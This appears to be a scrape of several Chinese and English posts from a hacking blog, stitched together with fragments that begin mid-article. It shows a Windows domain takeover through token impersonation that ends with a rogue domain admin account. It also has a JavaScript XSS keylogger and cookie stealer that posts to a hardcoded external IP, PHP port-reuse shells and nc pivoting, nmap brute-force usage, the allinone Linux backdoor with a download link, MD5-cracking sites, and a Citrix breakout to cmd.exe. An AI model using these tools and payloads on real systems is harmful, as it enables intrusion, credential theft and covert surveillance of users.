iiscnfg /export /f c:\chinadu.xml /sp / /children /inherited

但很多情况下如果在服务器直接执行的话，会报错cscript不是默认vbs解释器(iiscnfg是个VBS文件iiscnfg.vbs),所以我们应该用cscript加参数来运行:

cscript C:\WINDOWS\system32\iiscnfg.vbs /export /f c:\chinadu.xml /sp / /children /inherited

PS:开始/sp参数后面的路径老不对，后来发现用“/”根路径就可以了，信息还更全。
详细参数请Google。

PS:
标签有网站基本配置信息
标签有网站目录配置信息和其他配置信息
其它自己看

相关文章

• 2011年11月24日 -- 域内指定用户中马
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2010年05月5日 -- 搞内网的一个小技巧
• 2010年04月22日 -- 更改windows2003最大连接数
• 2010年03月1日 -- 让千千静听不再弹出广告
• 2010年01月19日 -- 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
• 2009年11月5日 -- MySQL导入数据库文件最大限制2048KB的修改解决办法
• 2009年09月22日 -- wp-postviews和Wp Super Cache有冲突
• 2009年09月22日 -- 流量过大，不得不启用WP Super Cache

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

相关文章

• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年11月24日 -- Citrix密码绕过漏洞引发的渗透
• 2011年11月24日 -- 域内指定用户中马
• 2011年04月28日 -- 哈希注入工具wce
• 2010年07月17日 -- 渗透某大型内网入侵过程
• 2010年04月29日 -- 域环境下的渗透
• 2010年04月23日 -- 专业渗透人员在渗透过程中注意事项
• 2009年08月27日 -- Infiltrating a Botnet
• 2009年08月24日 -- How to attack a windows domain
• 2009年07月1日 -- web和数据库分离的渗透思路

结 合这两点，由于php本身的一种运行方式是以apache的mod方式在apahe进程中存在的，所以对于php来说，他的自身进程也就是apache的 进程，所有apache原来在root下打开的文件描述符，他都能操作。于是乎，原有修补完毕的漏洞，经过PHP新功能的妙手回春，又重现江湖了。

那么究竟如何利用这个漏洞呢？在之前的那篇文章里， 我曾经给出了一个例子，就是直接复用当前连接80端口的socket，生成一个交互性shell。当时我没有给出自动化查找当前连接80端口socket 的实现，但实际上，在写文章的时候，我就私底下给出过一个利用shell工具自动化查找当前socket连接的方法：

但当时的例子已经不能在apache补丁后使用了，因为他用到了子进程再重定向输入输出来实现端口复用。而现在由于不能使用子进程来做这些事情，因此所有难点就集中在如何自动化的查找当前连接的socket上。

仔细看上面那些代码的原理，不过是使用netstat来进行当前系统中socket信息的输出比对。既然如此，我只要手工实现netstat的功能即可。那netstat又是如何实现的呢？

实 际上，netstat本身也是通过读取系统中的/proc/net/tcp(6)文件来实现对当前网络状态的监控输出的。我们只要依样画葫芦对此文件进行 解析（主要是合并ipv4和ipv6的内容，然后从16进制转换成字符串形式的ip，端口），然后再比对一下，只要发现此socket的远程ip和端口和 php中的$_SERVER['REMOTE_ADDR']，$_SERVER['REMOTE_PORT']相匹配即可。具体实现如下：

ok，FD一找到，剩下的就是生成bash了。这里也不能老样子使用system，得换一下使用proc_open（为什么自己想）。具体代码就不写了。直接上效果：

只要简单的一个GET，就可以直接获取交互式shell，穿透防火墙哦亲~

上 篇文章中还提到利用此方法可以做内网的端口转发，从而一个80端口走遍内网。不过当时没有给出实现，其实也非常简单，只需要将bash换成nc就可以了。 不过这里需要多加一个slave端，在本地监听端口，让本地程序连接此端口，然后在数据发送前，加上一个GET请求，然后直接转发即可。我这里也给一下效 果：

首先在本地执行一下slave程序，我这里是自己写的一个python脚本，pr.py。

第 一个参数为我们的脚本地址，第二个参数就是想要转发的目标地址了。我这里用的是target的22端口，实际上可以是他任意的内网地址。执行 后，pr.py就会在我的机器本地监听1234端口，等待其他程序连接了。所有发送到本机1234的数据都会被转发到target的22端口中。

看，网络连接中可以很清晰的看到我们的nc程序正在忠实的进行这转发操作，而我们的ssh连接也一切正常。
稳定，舒适，一个80端口一个连接，内网任我行。

具体实现，我放到下面了。如果你还有兴趣，就自己研究一下吧。例如多一个sock5代理，甚至只要给nc加一个参数就可以了。

下载地址：

http://www.4shell.org/tools/php_port_reuse.zip

相关文章

• 2011年12月3日 -- php open_basedir设置以及关于安全
• 2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP
• 2011年04月30日 -- Linux下Apache与PHP安全相关设置
• 2010年06月23日 -- 分享国外一个PHP DDOS的脚本
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2009年11月23日 -- php.ini文件A级变态配置
• 2009年04月17日 -- php导出oracle库的php代码
• 2009年01月24日 -- 猥琐流之php反弹
• 2008年12月9日 -- Php注入点构造
• 2008年11月16日 -- dedecms plus/infosearch.php Exploit

Apache+PHP配置方法有三种：
方法一：在php.ini里配置
open_basedir = .:/tmp/

方法二：在Apache配置的VirtualHost里设置(httpd-vhosts.conf)
php_admin_value open_basedir .:/tmp/

方法三：在Apache配置的Direcotry里设置
php_admin_value open_basedir .:/tmp/

关于三个配置方法的解释：
a、方法二的优先级高于方法一，也就是说方法二会覆盖方法一；方法三的优先级高于方法二，也就是说方法三会覆盖方法二；
b、配置目录里加了“/tmp/”是因为php默认的临时文件（如上传的文件、session等）会放在该目录，所以一般需要添加该目录，否则部分功能将无法使用；
c、配置目录里加了“.”是指运行php文件的当前目录，这样做可以避免每个站点一个一个设置；
d、如果站点还使用了站点目录外的文件，需要单独在对应VirtualHost设置该目录；

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
这里是我实验的一个例子,设置了两个host，当然一块把Apache设置vitualHost的方法也列出了：

#虚拟主机配置文件

NameVirtualHost *:80

#简单设置模式
<VirtualHost *:80>
ServerAdmin admin@8100.cc
DocumentRoot "C:/AWEB/phproot/test"
ServerName localhost
#ServerAlias www.test.com
ErrorLog "logs/error.log"
CustomLog "logs/access.log" common
</VirtualHost>
#详细设置模式
<VirtualHost *:80>
ServerAdmin admin@cc.cc
DocumentRoot "C:/AWEB/phproot/test2"
ServerName www.test2.com
# php_admin_value open_basedir C:/AWEB/phproot/test2/;C:/windows/temp/     放在这里也可以
<Directory "C:/AWEB/phproot/test2">
Options Indexes FollowSymLinks
AllowOverride Options FileInfo
Order allow,deny
Allow from all
DirectoryIndex index.htm index.html index.php
php_admin_value open_basedir c:/AWEB/phproot/test2/;C:/windows/temp/
</Directory>
Alias /phpmyadmin "C:/AWEB/phpMyAdmin/"
<Directory "C:/AWEB/phpMyAdmin">
AllowOverride AuthConfig
Order allow,deny
Allow from all
</Directory>
ErrorLog "logs/error.log"
CustomLog "logs/access.log" common
</VirtualHost>

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
最后转军神的那两句话：

一、open_basedir中处理文件路径时没有严格考虑目录的存在，这将导致本地包含或者本地文件读取的绕过（合并/aaa/../../导致linux的目录检查作废）。

二、open_basedir的值配置不当，有可能导致目录跨越（配置时忘记目录最后的斜杠 / ）。

相关文章

• 2011年12月3日 -- PHP端口复用的利用
• 2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP
• 2011年04月30日 -- Linux下Apache与PHP安全相关设置
• 2010年06月23日 -- 分享国外一个PHP DDOS的脚本
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2009年11月23日 -- php.ini文件A级变态配置
• 2009年04月17日 -- php导出oracle库的php代码
• 2009年01月24日 -- 猥琐流之php反弹
• 2008年12月9日 -- Php注入点构造
• 2008年11月16日 -- dedecms plus/infosearch.php Exploit

Searching for GCC...
The path "" is not valid path to the gcc binary.
Would you like to change it? [yes]
如果出现这个就表明gcc没有安装

yum install gcc gcc-c++ automake make
将编译环境一次装好

Searching for a valid kernel header path...
The path "" is not valid.
Would you like to change it? [yes]
如果出现这个就表示kernel-devel包没有安装

yum install kernel-devel

成功安装VMware tools时的提示：
Searching for GCC...
Detected GCC binary at "/usr/bin/gcc".
The path "/usr/bin/gcc" appears to be a valid path to the gcc binary.
Would you like to change it? [no]

Searching for a valid kernel header path...
Detected the kernel headers of the running kernel at
"/lib/modules/2.6.32-71.el6.i686/build/include".
The path "/lib/modules/2.6.32-71.el6.i686/build/include" appears to be a valid
path to the kernel headers of the running kernel.
Would you like to change it? [no]

相关文章

• 2011年06月10日 -- VMware 硬盘扩容
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示
• 2011年04月28日 -- 一次Linux下的普通渗透测试

国内：http://www.md5.com.cn/ (有特色，还没怎么用)

国内：www.xmd5.com(还不错)

国外：http://www.c0llision.net/webcrack.php(免费，还不错)

国外：http://hashkiller.com/ (免费，相当强大!!!)

国外：http://ops.conus.info/(免费，少有的oracle hash在线破解网站)

以上几个网站在我使用过程当中查询md5我感觉hashkiller和cmd5最强大，其实cmd5更强些，但是hashkiller是完全免费 的！所以hashkiller=cmd5>xmd5>collision，从测试来看，就md5和md5+salt来说，cmd5.com后 台破解比它的查询强大。

值得一提的是，很多只能靠cmd5.com后台破的md5密码能靠hashkiller网站直接查出来，只有少部分密码不行。可以先用 hashkiller和collision查询，再用cmd5和xmd5查询，然后再考虑使用cmd5后台破解功能，如果还破不出来那可能就真的破不出来 了。其实这五个网站也是一种检验自己密码强度的最佳方法，看看自己的密码是否在这数万亿的字典当中。另外需要补充的是，collision支持批量查 询：）

相关文章

• 2008年10月21日 -- 用显卡来暴力破解密码

var keys=''; //储存键盘鼠标记录

var hacker = 'http://218.6.132.15:8080/xss.php';

var Url = window.location;

var Domain = document.domain;

var Cookie = document.cookie;

document.onkeypress = function(e) { //劫持键盘消息

get = window.event ? event:e;

key = get.keyCode ? get.keyCode : get.charCode;

switch(key){

case 32 : key = '[Space]';break;

case 13 : key = '[Enter]';break;

case 8 : key = '[BackSpace]';break;

default :

key = String.fromCharCode(key);

keys += key;

}

}

window.onload = function(){ //窗口加载后发送cookie

setInterval(function(){

var Cookie_t = document.cookie;

if(Cookie_t != Cookie){

Cookie = Cookie_t;

}

SendData(hacker + '?m=c&c=' + Cookie);

},2000); //每2秒检测一次cookie,如果变化，就重新发送

}

document.onmousedown = function(e) {

get = window.event ? event : e; //创建事件对象

var mousekey = get.button; //获取鼠标键代码

switch(mousekey) {//1 鼠标左键 2 鼠标右键 4 滚动键

case 1 :

mousekey = '[Left Mouse Clik]';break;

case 2 :

mousekey = '[Right Mouse Clik]';break;

case 4 :

mousekey = '[Roll Mouse Clik]';break;

default :

mousekey = '[Unknown Mouse Key]';

}

keys += mousekey;

}

function SendData(src){

new Image().src = src; //建立图片对象用于发射数据

}

setInterval(function(){ SendData(hacker + '?m=k&c=' + keys);keys = ''; },5000); //每五秒发送一次键盘记录，初始化变量

相关文章

• 2008年10月20日 -- 共享一个键盘记录的源码
• 2006年10月12日 -- 奇炫的JavaScript代码

选了些自我感觉特别实用的：

ms-sql-brute

nmap -sV –script=ms-sql-brute <target>

ms-sql-xp-cmdshell

Example Usage：

nmap -sV –script=ms-sql-xp-cmdshell <target>
Script Output

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| mssql-xp-cmdshell:
|   Command: ipconfig /all; User: sa
|   output
|
|   Windows IP Configuration
|
|      Host Name . . . . . . . . . . . . : EDUSRV011
|      Primary Dns Suffix  . . . . . . . : cqure.net
|      Node Type . . . . . . . . . . . . : Unknown
|      IP Routing Enabled. . . . . . . . : No
|      WINS Proxy Enabled. . . . . . . . : No
|      DNS Suffix Search List. . . . . . : cqure.net
|
|   Ethernet adapter Local Area Connection 3:
|
|      Connection-specific DNS Suffix  . :
|      Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2
|      Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE
|      DHCP Enabled. . . . . . . . . . . : Yes
|      Autoconfiguration Enabled . . . . : Yes
|      IP Address. . . . . . . . . . . . : 192.168.56.3
|      Subnet Mask . . . . . . . . . . . : 255.255.255.0
|      Default Gateway . . . . . . . . . :
|      DHCP Server . . . . . . . . . . . : 192.168.56.2
|      Lease Obtained. . . . . . . . . . : den 21 mars 2010 00:12:10
|      Lease Expires . . . . . . . . . . : den 21 mars 2010 01:12:10
|

mysql-brute

Example Usage

nmap -sV –script=mysql-brute <target>

Script Output

3306/tcp open  mysql
| mysql-brute:
|   root:<empty> => Login Correct
|_  test:test => Login Correct

oracle-sid-brute

Example Usage

nmap –script=oracle-sid-brute –script-args=oraclesids=/path/to/sidfile -p 1521-1560 <host>
nmap –script=oracle-sid-brute -p 1521-1560 <host>

If no oraclesids file is specified, it falls back to the default oracle-sids file
License to use the oracle-sids file was granted by the author (Alexander Kornbrust)
Ref: http://seclists.org/nmap-dev/2009/q4/645

Script Output

PORT     STATE SERVICE REASON
1521/tcp open  oracle  syn-ack
| oracle-sid-brute:
|   orcl
|   prod
|_  devel

smb-brute

Example Usage

nmap –script smb-brute.nse -p445 <host>
sudo nmap -sU -sS –script smb-brute.nse -p U:137,T:139 <host>

Script Output

Host script results:
|  smb-brute:
|  |  bad name:test => Login was successful
|  |  consoletest:test => Password was correct, but user can’t log in without changing it
|  |  guest:<anything> => Password was correct, but user’s account is disabled
|  |  mixcase:BuTTeRfLY1 => Login was successful
|  |  test:password1 => Login was successful
|  |  this:password => Login was successful
|  |  thisisaverylong:password => Login was successful
|  |  thisisaverylongname:password => Login was successful
|  |  thisisaverylongnamev:password => Login was successful
|_ |_ web:TeSt => Password was correct, but user’s account is disabled

smb-enum-users

Example Usage

nmap –script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS –script smb-enum-users.nse -p U:137,T:139 <host>

Script Output

Host script results:
|  smb-enum-users:
|_ |_ Domain: RON-WIN2K-TEST; Users: Administrator, Guest, IUSR_RON-WIN2K-TEST, IWAM_RON-WIN2K-TEST, test1234, TsInternetUser

Host script results:
|  smb-enum-users:
|  |  RON-WIN2K-TESTAdministrator (RID: 500)
|  |  |  Description: Built-in account for administering the computer/domain
|  |  |_ Flags:       Password does not expire, Normal user account
|  |  RON-WIN2K-TESTGuest (RID: 501)
|  |  |  Description: Built-in account for guest access to the computer/domain
|  |  |_ Flags:       Password not required, Password does not expire, Normal user account
|  |  RON-WIN2K-TESTIUSR_RON-WIN2K-TEST (RID: 1001)
|  |  |  Full name:   Internet Guest Account
|  |  |  Description: Built-in account for anonymous access to Internet Information Services
|  |  |_ Flags:       Password not required, Password does not expire, Normal user account
|  |  RON-WIN2K-TESTIWAM_RON-WIN2K-TEST (RID: 1002)
|  |  |  Full name:   Launch IIS Process Account
|  |  |  Description: Built-in account for Internet Information Services to start out of process applications
|  |  |_ Flags:       Password not required, Password does not expire, Normal user account
|  |  RON-WIN2K-TESTtest1234 (RID: 1005)
|  |  |_ Flags:       Normal user account
|  |  RON-WIN2K-TESTTsInternetUser (RID: 1000)
|  |  |  Full name:   TsInternetUser
|  |  |  Description: This user account is used by Terminal Services.
|_ |_ |_ Flags:       Password not required, Password does not expire, Normal user account

smb-psexec

Example Usage

nmap –script smb-psexec.nse –script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p445 <host>
sudo nmap -sU -sS –script smb-psexec.nse –script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>

Script Output

Host script results:
|  smb-psexec:
|  |  Windows version
|  |  |_ Microsoft Windows 2000 [Version 5.00.2195]
|  |  IP Address and MAC Address from ‘ipconfig.exe’
|  |  |  Ethernet adapter Local Area Connection 2:
|  |  |         MAC Address: 00:50:56:A1:24:C2
|  |  |         IP Address: 10.0.0.30
|  |  |  Ethernet adapter Local Area Connection:
|  |  |_        MAC Address: 00:50:56:A1:00:65
|  |  User list from ‘net user’
|  |  |  Administrator            TestUser3                Guest
|  |  |  IUSR_RON-WIN2K-TEST      IWAM_RON-WIN2K-TEST      nmap
|  |  |  rontest123               sshd                     SvcCOPSSH
|  |  |_ test1234                 Testing                  TsInternetUser
|  |  Membership of ‘administrators’ from ‘net localgroup administrators’
|  |  |  Administrator
|  |  |  SvcCOPSSH
|  |  |  test1234
|  |  |_ Testing
|  |  Can the host ping our address?
|  |  |  Pinging 10.0.0.138 with 32 bytes of data:
|  |  |_ Reply from 10.0.0.138: bytes=32 time<10ms TTL=64
|  |  Traceroute back to the scanner
|  |  |_   1   <10 ms   <10 ms   <10 ms  10.0.0.138
|  |  ARP Cache from arp.exe
|  |  |    Internet Address      Physical Address      Type
|  |  |_   10.0.0.138            00-50-56-a1-27-4b     dynamic
|  |  List of listening and established connections (netstat -an)
|  |  |    Proto  Local Address          Foreign Address        State
|  |  |    TCP    0.0.0.0:22             0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:1028           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:4933           0.0.0.0:0              LISTENING
|  |  |    TCP    10.0.0.30:139          0.0.0.0:0              LISTENING
|  |  |    TCP    127.0.0.1:2528         127.0.0.1:2529         ESTABLISHED
|  |  |    TCP    127.0.0.1:2529         127.0.0.1:2528         ESTABLISHED
|  |  |    TCP    127.0.0.1:2531         127.0.0.1:2532         ESTABLISHED
|  |  |    TCP    127.0.0.1:2532         127.0.0.1:2531         ESTABLISHED
|  |  |    TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING
|  |  |    TCP    127.0.0.1:5152         127.0.0.1:2530         CLOSE_WAIT
|  |  |    UDP    0.0.0.0:135            *:*
|  |  |    UDP    0.0.0.0:445            *:*
|  |  |    UDP    0.0.0.0:1030           *:*
|  |  |    UDP    0.0.0.0:3456           *:*
|  |  |    UDP    10.0.0.30:137          *:*
|  |  |    UDP    10.0.0.30:138          *:*
|  |  |    UDP    10.0.0.30:500          *:*
|  |  |    UDP    10.0.0.30:4500         *:*
|  |  |_   UDP    127.0.0.1:1026         *:*
|  |  Full routing table from ‘netstat -nr’
|  |  |  ===========================================================================
|  |  |  Interface List
|  |  |  0×1 ……………………… MS TCP Loopback interface
|  |  |  0×2 …00 50 56 a1 00 65 …… VMware Accelerated AMD PCNet Adapter
|  |  |  0×1000004 …00 50 56 a1 24 c2 …… VMware Accelerated AMD PCNet Adapter
|  |  |  ===========================================================================
|  |  |  ===========================================================================
|  |  |  Active Routes:
|  |  |  Network Destination        Netmask          Gateway       Interface  Metric
|  |  |           10.0.0.0    255.255.255.0        10.0.0.30       10.0.0.30      1
|  |  |          10.0.0.30  255.255.255.255        127.0.0.1       127.0.0.1      1
|  |  |     10.255.255.255  255.255.255.255        10.0.0.30       10.0.0.30      1
|  |  |          127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1      1
|  |  |          224.0.0.0        224.0.0.0        10.0.0.30       10.0.0.30      1
|  |  |    255.255.255.255  255.255.255.255        10.0.0.30               2      1
|  |  |  ===========================================================================
|  |  |  Persistent Routes:
|  |  |    None
|_ |_ |_ Route Table

snmp-brute

Example Usage

nmap -sV –script=snmp-brute <target>

Script Output

PORT    STATE SERVICE
161/udp open  snmp
|_snmp-brute: public

snmp-win32-users、snmp-interfaces

Example Usage
nmap -sV -sC <target>
Script Output

| snmp-win32-users:
|   Administrator
|   Guest
|   IUSR_EDUSRV011
|   IWAM_EDUSRV011
|   SUPPORT_388945a0
|   Tomcat
|   db2admin
|   ldaptest
|_  patrik

随机日志

• 2008年11月14日 -- Discuz! 6.x/7.x SODB-2008-13 Exp
• 2009年09月8日 -- IIS6解析漏洞
• 2007年01月7日 -- 安全专家：2007将爆发黑客“世界大战”
• 2007年11月19日 -- 反黑经验：深入了解 DDoS与 DDoS追踪
• 2011年10月25日 -- HP大中华区总裁孙振耀退休感言
• 2006年09月21日 -- cmd.aspx
• 2011年04月30日 -- Linux基本操作命令
• 2010年06月5日 -- 即兴大发 吟诗一首
• 2007年05月17日 -- PJBlog的0Day…实际上就是跨站
• 2010年04月6日 -- 《使命召唤6：现代战争2》详尽联机教程

A great app level backdoor in Linux . Very useful while doing Linux pentest.

Written by Lion [HUC(Hack Union of China)] at year 2002

The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com)

/************************************************************************
* allinone.c for HUC (2002.1)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*

* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow > shadow
* or wget http://target:8008/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:) –> your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:) –> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:) –> your password
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC Website, Http://www.cnhonker.com
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/
Download:
http://www.4shell.org/tools/allinone.tgz

相关文章

• 2012年01月2日 -- How to attack a windows domain
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示

（1）MultiWin。在服务器上模拟本地应用程序处理的多用户层；
（2）服务器端ICA软件。将应用程序的执行和显示逻辑分开，应用程序100%在服务器上进行，并通过标准的网络协议（TCP/IP、SPX、IPX、NETBEUI、NWLINK）将显示界面传送给客户端；
（3）客户端设备上的ICA软件：一方面接收显示界面，同时向服务器发送鼠标移动和键盘击键动作信息，对基于服务器上的应用程序进行操作。
ICA具有网络传输的高效性、客户端设备的灵活性、操作平台的灵活性以及连接方式的灵活性。由于在客户端与服务器之间无数据传送，传送的只是显示界 面，并运用Citrix特有的SpeedScreen技术（传输的仅是显示界面变化的部分），平均只占用10K的网络带宽。ICA可以在从286计算机到 现在的PIII级计算机上正常工作，可以在任何客户端操作系统平台上正常工作，客户端与服务器可通过多种连接方式LAN、WAN、电话拨号、 Internet、无线的Web方式等。
迄今全球已有近十五万家用户采用了Citrix解决方案，享受到ICA技术的客户端更超过五千万，其中包括世界财富500强中99%以上的集团，以及欧洲财经时代500强中75%以上的公司，Citrix凭借其卓越的技术方案和业务成就，赢得了业界与用户的广泛赞誉。
二、Citrix的工作方式
Citrix主要有Citrix MetaFrame和Citrix NFuse/Citrix安全网关两种工作方式。
Citrix MetaFrame有XPs、XPa及XPe三个不同的版本，分别适合不同的环境使用；其中XPs是完全安全版，包括一些不同于其它版本的管理选 项；XPa和XPe则功能相对稍微少一点；Citrix 默认使用1494端口并且只和使用了Citrix ICA加密协议的客户端通信。
Citrix NFuse/Citrix安全网关中Citrix NFuse允许管理员锁定程序且只能通过Web浏览器通信。Citrix NFuse默认安装在IIS 5.0及以上版本上的。Citrix NFuse默认安装情况下的远程权限规则允许管理员执行Citrix安全网关。
三、一个Citrix渗透实例
（一）安装Citrix Presentation Server客户端
安装Citrix Presentation Server 客户端时跟安装其它普通软件没有什么不同，按照提示进行安装即可，不过在安装过程中需要注意一点，在选择客户端时只选择安装“Program Neighborhood”，“Web客户端”和“Program Neighborhood Agent”均不安装，即分别选中“Web客户端”和“Program Neighborhood Agent”前面向下的三角形箭头，然后选择“所有功能均不可用”，设置完毕后“Web客户端”和“Program Neighborhood Agent”前面会分别出现一个红色的叉，如图1所示。Citrix Presentation Server 客户端下载地址：http://www.antian365.com/viewthread.php?tid=6299&extra=page%3D1
图1 选择客户端
（二）搜索ICA文件
使用Citrix Presentation Server 客户端连接Citrix服务器主要通过读取ICA配置文件来实现，很多Citrix服务器在配置完毕后会将ICA文件放到网上供下载使用，也有一些是配置 完毕后无意放在网上，不过那种方式，只要获取正确的ICA文件即可进行连接。获取ICA文件最简单和方便的方法就是通过搜索引擎获取，直接打开IE浏览 器，在Google搜索中输入“Filetype:ica”搜索ica文件，如图2所示，搜索出来很多ICA文件。
图2 搜索ICA文件
（三）下载ICA文件
在Google搜索结果中任意选择一个搜索记录，然后右键单击选择“另存为”，将所选择的ICA文件保存到本地。保存ICA文件的目的就是为了在本地进行 查看，如图3所示，在ICA文件中可以看到有WFClient、ApplicationServer、Route Clearing DB、EncRC5-0、Compress五个参数，WFClient参数中主要指定软件的版本，Citrix服务器地址和连接端口；第二个参数主要指定 初始程序等设置。下载ICA文件的另外一个目的就是尝试修改ICA文件中的配置参数InitialProgram，在权限管理不严格的Citrix服务器 中如果InitialProgram参数的值修改成cmd.exe或explorer.exe，连接Citrix服务器后可以直接调出远程服务器上的命令 提示符或者资源管理器。出来这两个东东，呵呵，不说你也知道可以干什么了！
图3 ICA文件具体内容
（四）直接打开ICA文件
